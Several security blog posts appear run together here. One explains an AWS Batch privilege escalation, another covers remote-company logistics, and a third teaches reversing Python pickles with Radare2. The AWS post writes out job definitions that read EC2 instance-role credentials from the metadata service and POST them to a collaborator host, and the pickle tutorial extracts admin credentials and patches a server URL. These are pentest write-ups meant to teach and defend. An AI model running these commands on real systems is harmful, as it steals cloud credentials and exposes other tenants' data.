AWS Batch doesn’t create, administer, or perform lifecycle operations of the EKS clusters. AWS Batch orchestration scales up and down nodes managed by AWS Batch and runs pods on those nodes.

The logic conditions are similar to the ECS case.

Running Tasks With Two Metadata Services & Two Roles - The Unwanted Role Exposition Case

While testing a multi-tenant platform, we managed to leverage AWS Batch to compromise the cloud environment and perform privilege escalation.

The single tenants were using AWS Batch to execute some computational work given a certain input to be processed (tenant data).

The task jobs of all tenants were initialized and executed using the EC2 orchestration type, hence, all batch containers were running the same task-runner EC2 instances.

The scheme below describes the observed scenario at a high-level.

The tenant data (input) was mounted on the EC2 spot instance prior to the execution with Elastic File System (EFS). As can be seen in the design scheme, the specific tenant input data was shared to batch job containers via precise shared folders.

This might seem as a secure and well-isolated environment, but it wasn’t.

In order to illustrate the final exploitation, a few IAM concepts about the vulnerable context must be explained:

  • Within the described design, the compute environment EC2 spot instances needed a specific role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data

  • The task containers (batch jobs) had an execution role with the batch:RegisterJobDefinition and batch:SubmitJob permissions.

The Testing Phase

So, during testing we have obviously tried to execute code on the jobs to get access to some internal AWS credentials. Since the Instance Metadata Service (IMDS v2) was network restricted in the running containers, it was not possible to have an easy win by reaching 169.254.169.254 (IMDS IP).

Nevertheless, containers running in ECS and EKS have the Container Metadata Service (CMDS) running and reachable at 169.254.170.2 (did you know?). It is literally the doppelganger of the IMDS service, but for containers and pods in AWS.

Thanks to it, we were able to gather information about the running task. By looking at the AWS documentation, you can learn more about the many environment variables exposed to the running container. Among them, there is AWS_CONTAINER_CREDENTIALS_RELATIVE_URI.

In fact, the CMDS protects users against SSRF interactions by setting a dynamic credential endpoint saved as an environmental variable. By doing so, basic SSRFs cannot find out the pseudo-random part in it and retrieve credentials.

The screenshot below shows an interaction with the CMDS to get the credentials from a running container (our execution context).

At this point, we had the credentials for the ecs-role owned by the running jobs.

Among the ECS-related execution permissions, it had RegisterJobDefinition, SubmitJob and DescribeJobQueues for the AWS Batch service.

Since the basic threat model assumed that users had command execution on the running containers, a certain level of control over the job definitions was not an issue.

Hence, having the RegisterJobDefinition and SubmitJob permissions exposed in the user-controlled context was not considered a vulnerability in the first place.

So, the next question was pretty obvious:

The Turning Point

After many hours of dorking and code review, we managed to discover two additional details:

  • In the AWS Batch with EC2 compute environment, the jobs’ containers run with host network configuration. This means that Batch job containers use the host EC2 Spot instance’s networking directly
  • The platform was restricting the IMDS connectivity on job containers when the worker was starting the tasks

Due to these conditions, a batch job could call the IMDSv2 service on behalf of the host EC2 Spot instance if it started without the restrictions applied by the worker, potentially leading to a privilege escalation:

  1. An attacker with the leaked batch job credentials could use RegisterJobDefinition and SubmitJob to define and execute a malicious AWS Batch job.

  2. The malicious job is able to dialogue with the IMDS service on behalf of the host EC2 Spot instance since the network restrictions to the IMDS were not applied.

  3. In this way, it was possible to obtain credentials for the IAM Role owned by the EC2 Spot instances.

The compute environment EC2 spot instances needed a specific role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data etc.

PrivEsc Exploitation

The exploitation phase required two job definitions to interact with the IMDSv2, one to get the instance IAM role name, and one to retrieve the IAM security credentials for the leaked role name.

Job Definition 1 - Getting the host EC2 Spot instance role name

$ aws batch register-job-definition --job-definition-name poc-get-rolename --type container --container-properties '{ "image": "curlimages/curl",
"vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-
data/iam/security-credentials/ > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

After defining the job definition, submit a new job using the newly create job definition:

aws batch submit-job --job-name attacker-jb-getrolename --job-queue LowPriorityEc2 --job-definition poc-get-rolename --scheduling-priority-override 999 --share-identifier asd

Note: the job queue name was retrievable with aws batch describe-job-queues

The attacker collaborator server received something like:

POST /exfil HTTP/1.1
Host: fo78ichlaqnfn01sju2ck6ixwo2fqaez.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

iam-instance-role-20230322003148155300000001

Job Definition 2 - Getting the credentials for the host EC2 Spot instance role

$ aws batch register-job-definition --job-definition-name poc-get-aimcreds --type container --container-properties '{ "image": "curlimages/curl",
"vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-
data/iam/security-credentials/ROLE_NAME > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

Like for the previous definition, by submitting the job, the collaborator received the output.

POST /exfil HTTP/1.1
Host: 4otxi1haafn4np1hjj21kvimwd24qyen.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 1430
Content-Type: application/x-www-form-urlencoded

{"RoleArn":"arn:aws:iam::1235122316123:role/ecs-role","AccessKeyId":"<redacted>","SecretAccessKey":"<redacted>","Token":"<redacted>","Expiration":"2023-03-22T06:54:42Z"}

This time it contained the AWS credentials for the host EC2 Spot instance role.

Privilege escalation achieved! The obtained role allowed us to access other tenants’ data and do much more.

Default Host Network Mode In AWS Batch With EC2 Orchestration

In AWS Batch with EC2 compute environments, the containers run with bridged network mode.

With such configuration, the containers (batch jobs) have access to both the EC2 IMDS and the CMDS.

The issue lies in the fact that the container job is able to dialogue with the IMDSv2 service on behalf of the EC2 Spot instance because they share the same network interface.

In conclusion, it is very important to know about such behavior and avoid the possibility of introducing privilege escalation patterns while designing cloud environments.

For cloud security auditors

When the platform uses AWS Batch compute environments with EC2 orchestration, answer the following questions:

  • Always keep in consideration the security of the AWS Batch jobs and their possible compromise. A threat actor could escalate vertically/horizontally and gain more access into the cloud infrastructure.
    • Which aspects of the job execution are controllable by the external user?
    • Is command execution inside the jobs intended by the platform?
      • If yes, investigate the permissions available through the CMDS
      • If no, attempt to achieve command execution within the jobs’ context
    • Is the IMDS restricted from the job execution context?
  • Which types of Compute Environments are used in the platform?
    • Are there any Compute Environments configured with EC2 orchestration?
      • If yes, which role is assigned to EC2 Spot Instances?

Note: The dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with EC2 launch type.

For developers

Developers should be aware of the fact that AWS Batch with EC2 compute environments will run containers with host network configuration. Consequently, the executed containers (batch jobs) have access to both the CMDS for the task role and the IMDS for the host EC2 Spot Instance role.

In order to prevent privilege escalation patterns, Job runs must match the following configurations:

  • Having the IMDS restricted at network level in running jobs. Read the documentation here

  • Restricting the batch job execution role and job role IAM permissions. In particular, avoid assigning RegisterJobDefinition and SubmitJob permissions in job-related or accessible policies to prevent uncontrolled execution by attackers landing on the job context

If both configurations are not applicable in your design, consider changing the orchestration type.

Note: Once again, the dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with the EC2 launch type.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!

Resources

Logistics for a Remote Company

Logistics and shipping devices across the world can be a challenging task, especially when dealing with customs regulations. For the past few years, I have had the opportunity to learn about these complex processes and how to manage them efficiently. As a Practice Manager at Doyensec, I was responsible for building processes from scratch and ensuring that our logistics operations ran smoothly.

Since 2018, I have had to navigate the intricate world of logistics and shipping, dealing with everything from international regulations to customs clearance. Along the way, I have learned valuable lessons and picked up essential skills that have helped me manage complex logistics operations with ease.

Logistics for a Remote Company

In this post, I will share my experiences and insights on managing shipping devices across the world, dealing with customs, and building efficient logistics processes. Whether you’re new to logistics or looking to improve your existing operations, my learnings and experiences will prove useful.

Employee Onboarding

At Doyensec, when we hire a new employee, our HR specialist takes care of all the necessary paperwork, while I focus on logistics. This includes creating a welcome package and shipping all the necessary devices to the employee’s location. While onboarding employees from the United States and European Union is relatively easy, dealing with customs regulations in other countries can be quite challenging.

For instance, shipping devices from/to countries such as the UK (post Brexit), Turkey, or Argentina can be quite complicated. We need to be aware of the customs regulations in these countries to ensure that our devices are not bounced back or charged with exorbitant custom fees.

Navigating customs regulations in different countries can be a daunting task. Still, we’ve learned that conducting thorough research beforehand and ensuring that our devices comply with the necessary regulations can help avoid any unnecessary delays or fees. At Doyensec, we believe that providing our employees with the necessary tools and equipment to perform their job is essential, and we strive to make this process as seamless as possible, regardless of where the employee is located.

Testing Hardware Management

At Doyensec, dealing with testing hardware is a crucial aspect of our operations. We use a variety of testing equipment for our work. This means that we often have to navigate customs regulations, including the payment of customs fees, to ensure that our laptops, Yubikeys and mobile devices arrive on time.

To avoid delays in conducting security audits, we often choose to pay additional fees, including VAT and customs charges, to ensure that we receive hardware promptly. We understand that time is of the essence, and we prioritize meeting our clients’ needs, even if it means spending more money to ensure items required for testing are not held up at customs.

In addition to paying customs fees, we also make sure to keep all necessary documentation for each piece of hardware that we manage. This documentation helps us to speed up further processes and ensures that we can quickly identify and locate each and every piece of hardware when needed.

The hardware we most frequently deal with are laptops, though we also occasionally receive YubiKeys as well. Fortunately, YubiKeys generally do not cause any problems at customs (low market value), and we can usually receive them without any significant issues.

Over time, we’ve learned that different shipping companies have different approaches to customs regulations. To ensure that we can deliver quality service to our clients, we prefer to use companies that we know will treat us fairly and deliver hardware on time. We have almost always had a positive experience with DHL as our preferred shipping provider. DHL’s automated custom processes and documentation have been particularly helpful in ensuring smooth and efficient shipping of Doyensec’s hardware and documents across the world. DHL’s reliability and efficiency have been critical in allowing Doyensec to focus on its core business, which is finding bugs for our fantastic clients.

We have a preference for avoiding local post office services when it comes to shipping our hardware or documents. While local post office services may be slightly cheaper, they often come with more problems. Packages may get stuck somewhere during the delivery process, and it can be difficult to follow up with customer service to resolve the issue. This can lead to delayed deliveries, frustrated customers, and ultimately, a negative impact on the company’s reputation. Therefore, Doyensec opts for more reliable shipping options, even if they come with a slightly higher price tag.

2022 Holiday Gifts from Japan

At Doyensec, we believe in showing appreciation for our employees and their hard work. That’s why we decided to import some gifts from Japan to distribute among our team members. However, what we did not anticipate was the range of custom fees that we would encounter while shipping these gifts to different countries.

We shipped these gifts to 7 different countries, all through the same shipping company. However, we found that custom officers had different approaches even within the same country. This resulted in a range of custom fees, ranging from 0 to 45 euros, for each package.

The interesting part was that every package had the same invoice from the Japanese manufacturer attached, but the fees still differed significantly. It was challenging to understand why this was the case, and we still don’t have a clear answer.

Overall, our experience with importing gifts from Japan highlighted the importance of being prepared for unexpected customs fees and the unpredictability of customs regulations.

Conclusion

Managing devices and shipping packages to team members at a globally distributed company, even with a small team, can be quite challenging. Ensuring that packages are delivered promptly and to the correct location can be very difficult, especially with tight project deadlines.

Although it would be easier to manage devices if everyone worked from the same office, at Doyensec, we value remote work and the flexibility that it provides. That’s why we have invested in developing processes and protocols to ensure that our devices are managed efficiently and securely, despite the remote working environment.

While some may argue that these challenges are reason enough to abandon remote work and return to the office, we believe that the benefits of remote work far outweigh any challenges we may face. At Doyensec, remote work allows us to hire talented individuals from all the EU and US/Canada, offering a diverse and inclusive work environment. Remote work also allows for greater flexibility and work-life balance, which can result in happier and more productive employees.

In conclusion, while managing devices in a remote work environment can be challenging, we believe that the benefits of remote work make it worthwhile. At Doyensec, we have developed strategies to manage devices efficiently, and we continue to support remote work and its many benefits.

Reversing Pickles with r2pickledec

R2pickledec is the first pickle decompiler to support all instructions up to protocol 5 (the current). In this post we will go over what Python pickles are, how they work and how to reverse them with Radare2 and r2pickledec. An upcoming blog post will go even deeper into pickles and share some advanced obfuscation techniques.

What are pickles?

Pickles are the built-in serialization algorithm in Python. They can turn any Python object into a byte stream so it may be stored on disk or sent over a network. Pickles are notoriously dangerous. You should never unpickle data from an untrusted source. Doing so will likely result in remote code execution. Please refer to the documentation for more details.

Pickle Basics

Pickles are implemented as a very simple assembly language. There are only 68 instructions and they mostly operate on a stack. The instruction names are pretty easy to understand. For example, the instruction empty_dict will push an empty dictionary onto the stack.

The stack only allows access to the top item, or items in some cases. If you want to grab something else, you must use the memo. The memo is implemented as a dictionary with positive integer indexes. You will often see memoize instructions. Naively, the memoize instruction will copy the item at the top of the stack into the next index in the memo. Then, if that item is needed later, a binget n can be used to get the object at index n.

To learn more about pickles, I recommend playing with some pickles. Enable descriptions in Radare2 with e asm.describe = true to get short descriptions of each instruction. Decompile simple pickles that you build yourself, and see if you can understand the instructions.

Installing Radare2 and r2pickledec

For reversing pickles, our tool of choice is Radare2 (r2 for short). Package managers tend to ship really old r2 versions. In this case it’s probably fine, I added the pickle arch to r2 a long time ago. But if you run into any bugs I suggest installing from source.

In this blog post, we will primarily be using our R2pickledec decompiler plugin. I purposely wrote this plugin to only rely on r2 libraries. So if r2 works on your system, r2pickledec should work too. You should be able to instal with r2pm.

$ r2pm -U             # update package db
$ r2pm -ci pickledec  # clean install

You can verify everything worked with the following command. You should see the r2pickledec help menu.

$ r2 -a pickle -qqc 'pdP?' -
Usage: pdP[j]  Decompile python pickle
| pdP   Decompile python pickle until STOP, eof or bad opcode
| pdPj  JSON output
| pdPf  Decompile and set pick.* flags from decompiled var names

Reversing a Real pickle with Radare2 and r2pickledec

Let’s reverse a real pickle. One never reverses without some context, so let’s imagine you just broke into a webserver. The webserver is intended to allow employees of the company to perform privileged actions on client accounts. While poking around, you find a pickle file that is used by the server to restore state. What interesting things might we find in the pickle?

The pickle appears below base64 encoded. Feel free to grab it and play along at home.

$ base64 -i /tmp/blog2.pickle -b 64
gASVDQYAAAAAAACMCF9fbWFpbl9flIwDQXBplJOUKYGUfZQojAdzZXNzaW9ulIwR
cmVxdWVzdHMuc2Vzc2lvbnOUjAdTZXNzaW9ulJOUKYGUfZQojAdoZWFkZXJzlIwT
cmVxdWVzdHMuc3RydWN0dXJlc5SME0Nhc2VJbnNlbnNpdGl2ZURpY3SUk5QpgZR9
lIwGX3N0b3JllIwLY29sbGVjdGlvbnOUjAtPcmRlcmVkRGljdJSTlClSlCiMCnVz
ZXItYWdlbnSUjApVc2VyLUFnZW50lIwWcHl0aG9uLXJlcXVlc3RzLzIuMjguMpSG
lIwPYWNjZXB0LWVuY29kaW5nlIwPQWNjZXB0LUVuY29kaW5nlIwNZ3ppcCwgZGVm
bGF0ZZSGlIwGYWNjZXB0lIwGQWNjZXB0lIwDKi8qlIaUjApjb25uZWN0aW9ulIwK
Q29ubmVjdGlvbpSMCmtlZXAtYWxpdmWUhpR1c2KMB2Nvb2tpZXOUjBByZXF1ZXN0
cy5jb29raWVzlIwRUmVxdWVzdHNDb29raWVKYXKUk5QpgZR9lCiMB19wb2xpY3mU
jA5odHRwLmNvb2tpZWphcpSME0RlZmF1bHRDb29raWVQb2xpY3mUk5QpgZR9lCiM
CG5ldHNjYXBllIiMB3JmYzI5NjWUiYwTcmZjMjEwOV9hc19uZXRzY2FwZZROjAxo
aWRlX2Nvb2tpZTKUiYwNc3RyaWN0X2RvbWFpbpSJjBtzdHJpY3RfcmZjMjk2NV91
bnZlcmlmaWFibGWUiIwWc3RyaWN0X25zX3VudmVyaWZpYWJsZZSJjBBzdHJpY3Rf
bnNfZG9tYWlulEsAjBxzdHJpY3RfbnNfc2V0X2luaXRpYWxfZG9sbGFylImMEnN0
cmljdF9uc19zZXRfcGF0aJSJjBBzZWN1cmVfcHJvdG9jb2xzlIwFaHR0cHOUjAN3
c3OUhpSMEF9ibG9ja2VkX2RvbWFpbnOUKYwQX2FsbG93ZWRfZG9tYWluc5ROdWKM
CF9jb29raWVzlH2UdWKMBGF1dGiUjAVhZG1pbpSMD1BpY2tsZXMgYXJlIGZ1bpSG
lIwHcHJveGllc5R9lIwFaG9va3OUfZSMCHJlc3BvbnNllF2Uc4wGcGFyYW1zlH2U
jAZ2ZXJpZnmUiIwEY2VydJROjAhhZGFwdGVyc5RoFClSlCiMCGh0dHBzOi8vlIwR
cmVxdWVzdHMuYWRhcHRlcnOUjAtIVFRQQWRhcHRlcpSTlCmBlH2UKIwLbWF4X3Jl
dHJpZXOUjBJ1cmxsaWIzLnV0aWwucmV0cnmUjAVSZXRyeZSTlCmBlH2UKIwFdG90
YWyUSwCMB2Nvbm5lY3SUTowEcmVhZJSJjAZzdGF0dXOUTowFb3RoZXKUTowIcmVk
aXJlY3SUTowQc3RhdHVzX2ZvcmNlbGlzdJSPlIwPYWxsb3dlZF9tZXRob2RzlCiM
BVRSQUNFlIwGREVMRVRFlIwDUFVUlIwDR0VUlIwESEVBRJSMB09QVElPTlOUkZSM
DmJhY2tvZmZfZmFjdG9ylEsAjBFyYWlzZV9vbl9yZWRpcmVjdJSIjA9yYWlzZV9v
bl9zdGF0dXOUiIwHaGlzdG9yeZQpjBpyZXNwZWN0X3JldHJ5X2FmdGVyX2hlYWRl
cpSIjBpyZW1vdmVfaGVhZGVyc19vbl9yZWRpcmVjdJQojA1hdXRob3JpemF0aW9u
lJGUdWKMBmNvbmZpZ5R9lIwRX3Bvb2xfY29ubmVjdGlvbnOUSwqMDV9wb29sX21h
eHNpemWUSwqMC19wb29sX2Jsb2NrlIl1YowHaHR0cDovL5RoVymBlH2UKGhaaF0p
gZR9lChoYEsAaGFOaGKJaGNOaGROaGVOaGaPlGhoaG9ocEsAaHGIaHKIaHMpaHSI
aHUojA1hdXRob3JpemF0aW9ulJGUdWJoeH2UaHpLCmh7SwpofIl1YnWMBnN0cmVh
bZSJjAl0cnVzdF9lbnaUiIwNbWF4X3JlZGlyZWN0c5RLHnVijAdiYXNldXJslIwU
aHR0cHM6Ly9leGFtcGxlLmNvbS+UdWIu

We decode the pickle and put it in a file, lets call it test.pickle. We then open the file with r2. We also run x to see some hex and pd to print dissassembly. If you ever want to know what an r2 command does, just run the command but append a ? to the end to get a help menu (e.g., pd?).

$ r2 -a pickle test.pickle
 -- .-. .- -.. .- .-. . ..---
[0x00000000]> x
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00000000  8004 95bf 0500 0000 0000 008c 1172 6571  .............req
0x00000010  7565 7374 732e 7365 7373 696f 6e73 948c  uests.sessions..
0x00000020  0753 6573 7369 6f6e 9493 9429 8194 7d94  .Session...)..}.
0x00000030  288c 0768 6561 6465 7273 948c 1372 6571  (..headers...req
0x00000040  7565 7374 732e 7374 7275 6374 7572 6573  uests.structures
0x00000050  948c 1343 6173 6549 6e73 656e 7369 7469  ...CaseInsensiti
0x00000060  7665 4469 6374 9493 9429 8194 7d94 8c06  veDict...)..}...
0x00000070  5f73 746f 7265 948c 0b63 6f6c 6c65 6374  _store...collect
0x00000080  696f 6e73 948c 0b4f 7264 6572 6564 4469  ions...OrderedDi
0x00000090  6374 9493 9429 5294 288c 0a75 7365 722d  ct...)R.(..user-
0x000000a0  6167 656e 7494 8c0a 5573 6572 2d41 6765  agent...User-Age
0x000000b0  6e74 948c 1670 7974 686f 6e2d 7265 7175  nt...python-requ
0x000000c0  6573 7473 2f32 2e32 382e 3294 8694 8c0f  ests/2.28.2.....
0x000000d0  6163 6365 7074 2d65 6e63 6f64 696e 6794  accept-encoding.
0x000000e0  8c0f 4163 6365 7074 2d45 6e63 6f64 696e  ..Accept-Encodin
0x000000f0  6794 8c0d 677a 6970 2c20 6465 666c 6174  g...gzip, deflat
[0x00000000]> pd
            0x00000000      8004           proto 0x4
            0x00000002      95bf05000000.  frame 0x5bf
            0x0000000b      8c1172657175.  short_binunicode "requests.sessions" ; 0xd
            0x0000001e      94             memoize
            0x0000001f      8c0753657373.  short_binunicode "Session"  ; 0x21 ; 2'!'
            0x00000028      94             memoize
            0x00000029      93             stack_global
            0x0000002a      94             memoize
            0x0000002b      29             empty_tuple
            0x0000002c      81             newobj
            0x0000002d      94             memoize
            0x0000002e      7d             empty_dict
            0x0000002f      94             memoize
            0x00000030      28             mark
            0x00000031      8c0768656164.  short_binunicode "headers"  ; 0x33 ; 2'3'
            0x0000003a      94             memoize
            0x0000003b      8c1372657175.  short_binunicode "requests.structures" ; 0x3d ; 2'='
            0x00000050      94             memoize
            0x00000051      8c1343617365.  short_binunicode "CaseInsensitiveDict" ; 0x53 ; 2'S'
            0x00000066      94             memoize
            0x00000067      93             stack_global

From the above assembly it appears this file is indeed a pickle. We also see requests.sessions and Session as strings. This pickle likely imports requests and uses sessions. Let’s decompile it. We will run the command pdPf @0 ~.... This takes some explaining though, since it uses a couple of r2’s features.

  • pdPf - R2pickledec uses the pdP command (see pdP?). Adding an f causes the decompiler to set r2 flags for every variable name. This will make renaming variables and jumping to interesting locations easier.

  • @0 - This tells r2 to run the command at offset 0 instead of the current seek address. This does not matter now because our current offset defaults to
    1. I just make this a habit in general to prevent mistakes when I am seeking around to patch something.
  • ~.. - This is the r2 version of |less. It uses r2’s built in pager. If you like the real less better, you can just use |less. R2 commands can be piped to any command line program.

Once we execute the command, we will see a Python-like source representation of the pickle. The code is seen below, but snipped. All comments below were added by the decompiler.

## VM stack start, len 1
## VM[0] TOP
str_xb = "__main__"
str_x16 = "Api"
g_Api_x1c = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)
str_x54 = "headers"
str_x5e = "requests.structures"
str_x74 = "CaseInsensitiveDict"
g_CaseInsensitiveDict_x8a = _find_class(str_x5e, str_x74)
str_x91 = "_store"
str_x9a = "collections"
str_xa8 = "OrderedDict"
g_OrderedDict_xb6 = _find_class(str_x9a, str_xa8)
str_xbc = "user-agent"
str_xc9 = "User-Agent"
str_xd6 = "python-requests/2.28.2"
tup_xef = (str_xc9, str_xd6)
str_xf1 = "accept-encoding"
...
str_x5c9 = "stream"
str_x5d3 = "trust_env"
str_x5e0 = "max_redirects"
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

It’s usually best to start reversing at the end with the return line. That is what is being returned from the pickle. Hit G to go to the end of the file. You will see the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

The what_x616 variable is getting returned. The what part of the variable indicates that the decompiler does not know what type of object this is. This is because what_x616 is the result of a g_Api_x1c.__new__ call. On the other hand, g_Api_x1c gets a g_ prefix. The decompiler knows this is a global, since it is from an import. It even adds the Api part in to hint at what the import it. The x1c and x616 indicate the offset in the pickle where the object was created. We will use that later to patch the pickle.

Since we used flags, we can easily rename variables by renaming the flag. It might be helpful to rename the g_Api_x1c to make it easier to search for. Rename the flag with fr pick.g_Api_x1c pick.api. Notice, the flag will tab complete. List all flags with the f command. See f? for help.

Now run pdP @0 ~.. again. Instead of g_Api_x1c you will see api. If we search for its first use, you will find the below code.

str_xb = "__main__"
str_x16 = "Api"
api = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)

Naively, _find_class(module, name) is equivalent to _getattribute(sys.modules[module], name)[0]. We can see the module is __main__ and the name is Api. So the api variable is just __main__.Api.

In this snippet of code, we see the request session being imported. You may have noticed the baseurl field in the previous snippet of code. Looks like this object contains a session for making backend API requests. Can we steal something good from it? Googling for β€œrequests session basic authentication” turns up the auth attribute. Let’s look for β€œauth” in our pickle.

str_x30e = "auth"
str_x315 = "admin"
str_x31d = "Pickles are fun"
tup_x32f = (str_x315, str_x31d)
str_x331 = "proxies"
dict_x33b = {}
...
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}

It might be helpful to rename variables for understanding, or run pdP > /tmp/pickle_source.py to get a .py file to open in your favorite text editor. In short though, the above code sets up the dictionary dict_x51 where the auth element is set to the tuple ("admin", "Pickles are fun").

We just stole the admin credentials!

Patching

Now I don’t recommend doing this on a real pentest, but let’s take things farther. We can patch the pickle to use our own malicious webserver. We first need to find the current URL, so we search for β€œhttps” and find the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = api.__new__(g_Api_x1c, *())

So the baseurl of the API is being set to https://example.com/. To patch this, we seek to where the URL string is created. We can use the x5fe in the variable name to know where the variable was created, or we can just seek to the pick.str_x5e flag. When seeking to a flag in r2 you can tab complete the flag. Notice the prompt changes its location number after the seek command.

[0x00000000]> s pick.str_x5fe
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600

Let’s overwrite this URL with https://doyensec.com/. The below Radare2 commands are commented so you can understand what they are doing.

[0x000005fe]> oo+ # reopen file in read/write mode
[0x000005fe]> pd 3 # double check what next instructions should be
            ;-- pick.str_x5fe:
            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600
            0x00000614      94             memoize
            0x00000615      75             setitems
[0x000005fe]> r+ 1 # add one extra byte to the file, since our new URL is slightly longer
[0x000005fe]> wa short_binunicode "https://doyensec.com/"
INFO: Written 23 byte(s) (short_binunicode "https://doyensec.com/") = wx 8c1568747470733a2f2f646f79656e7365632e636f6d2f @ 0x000005fe
[0x000005fe]> pd 3     # double check we did not clobber an instruction
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600
            0x00000615      94             memoize
            ;-- pick.what_x616:
            0x00000616      75             setitems
[0x000005fe]> pdP @0 |tail      # check that the patch worked
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://doyensec.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x617 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x617.__setstate__(dict_x21)
return what_x617

JSON and Automation

Imagine this is just the first of 100 files and you want to patch them all. Radare2 is easy to script with r2pipe. Most commands in r2 have a JSON variant by adding a j to the end. In this case, pdPj will produce an AST in JSON. This is complete with offsets. Using this you can write a parser that will automatically find the baseurl element of the returned api object, get the offset and patch it.

JSON can also be helpful without r2pipe. This is because r2 has a bunch of built-in features for dealing with JSON. For example, we can pretty print JSON with ~{}, but for this pickle it would produce 1492 lines of JSON. So better yet, use r2’s internal gron output with ~{=} and grep for what you want.

[0x000005fe]> pdPj @0 ~{=}https
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[1][1].value[1].args[0].value[0][1].value[1].args[0].value[10][1].value[0].value = "https";
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[8][1].value[1].args[0].value = "https://";
json.stack[0].value[1].args[0].value[1][1].value = "https://doyensec.com/";

Now we can go use the provided JSON path to find the offset of the doyensec.com URL.

[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].value}
https://doyensec.com/
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1]}
{"offset":1534,"type":"PY_STR","value":"https://doyensec.com/"}
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}
1534
[0x00000000]> s `pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}` ## seek to address using subcomand
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600

Don’t forget you can pipe to external commands. For example, pdPj |jq can be used to search the AST for different patterns. For example, you could return all objects where the type is PY_GLOBAL.

Conclusion

The r2pickledec plugin simplifies reversing of pickles. Because it is a r2 plugin, you get all the features of r2. We barely scratched the surface of what r2 can do. If you’d like to learn more, check out the r2 book. Be sure to keep an eye out for my next post where I will go into Python pickle obfuscation techniques.

Testing Zero Touch Production Platforms and Safe Proxies

As more companies develop in-house services and tools to moderate access to production environments, the importance of understanding and testing these Zero Touch Production (ZTP) platforms grows 1 2. This blog post aims to provide an overview of ZTP tools and services, explore their security role in DevSecOps, and outline common pitfalls to watch out for when testing them.

SRE? ZTP?

β€œEvery change in production must be either made by automation, prevalidated by software or made via audited break-glass mechanism.” – Seth Hettich, Former Production TL, Google

This terminology was popularized by Google’s DevOps teams and is the golden standard to this day. According to this picture, there are SREs, a selected group of engineers that can exclusively use their SSH production access to act when something breaks. But that access introduces reliability and security risks if they make a mistake or their accounts are compromised. To balance this risk, companies should automate the majority of the production operations while providing routes for manual changes when necessary. This is the basic reasoning behind what was introduced by the β€œZero Touch Production” pattern.

The way we all feel about SRE

Safe Proxies In Production

The β€œSafe Proxy” model refers to the tools that allow authorized persons to access or modify the state of physical servers, virtual machines, or particular applications. From the original definition:

